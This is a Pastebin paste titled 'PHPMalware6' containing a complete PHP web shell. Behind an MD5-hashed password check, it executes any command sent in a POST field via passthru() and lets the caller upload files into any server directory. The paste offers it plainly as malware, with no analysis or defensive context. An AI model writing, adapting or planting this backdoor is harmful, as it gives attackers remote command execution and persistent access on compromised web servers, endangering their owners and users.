Advertisement
FlyFar

PHPMalware6

Feb 8th, 2024
779
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.38 KB | Cybersecurity | 0 0
  1. <?php
  2. ini_set('display_errors','Off');
  3. error_reporting('E_ALL');
  4. $multipart = "236c985403e7e1";
  5. $part = "450be30e0288de41b6";
  6. if (md5($_POST['multipart'])==$multipart.$part){
  7. echo '
  8. <div align="left">
  9. <font size="1">:</font>
  10. </div>
  11. <form action="'.$_SERVER['PHP_SELF'].'" name="cmd"  method="POST" enctype="multipart/form-data">
  12. <input type="text" name="cmd" size="31" class="input">
  13. <input type="hidden" name="multipart" size="31" class="pp" value="'.$_POST['multipart'].'">
  14. <br>
  15. <pre>';
  16. if ($_POST['cmd']){
  17. $cmd = $_POST['cmd'];
  18. passthru($cmd);
  19. echo  "<p>".@getcwd()."</p>";
  20. }
  21. $uploaded = $_FILES['file']['tmp_name'];
  22. if (file_exists($uploaded)) {
  23.    $pwddir = $_POST['dir'];
  24.    $real = $_FILES['file']['name'];
  25.    $dez = $pwddir."/".$real;
  26.    copy($uploaded, $dez);
  27.    echo "<p>$dez</p>";
  28. }
  29. echo '<form action="'.$_SERVER['PHP_SELF'].'" name="form1" method="post" enctype="multipart/form-data">
  30. <input type="text" name="dir" size="31" value="'.passthru("pwd").'">
  31. <input type="submit" name="submit2" value="Upload">
  32. <input type="file" name="file" size="15">
  33. <input type="hidden" name="multipart" size="31" class="pp" value="'.$_POST['multipart'].'">
  34.       </td>
  35.    </tr>
  36. </table>';
  37. }
  38. else
  39. {
  40. echo '<head><form name="multipart" method="POST" enctype="multipart/form-data">
  41. <input type="text" name="multipart" size="31" class="input">';
  42. }
  43. echo '</body>
  44. </html>';
  45. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement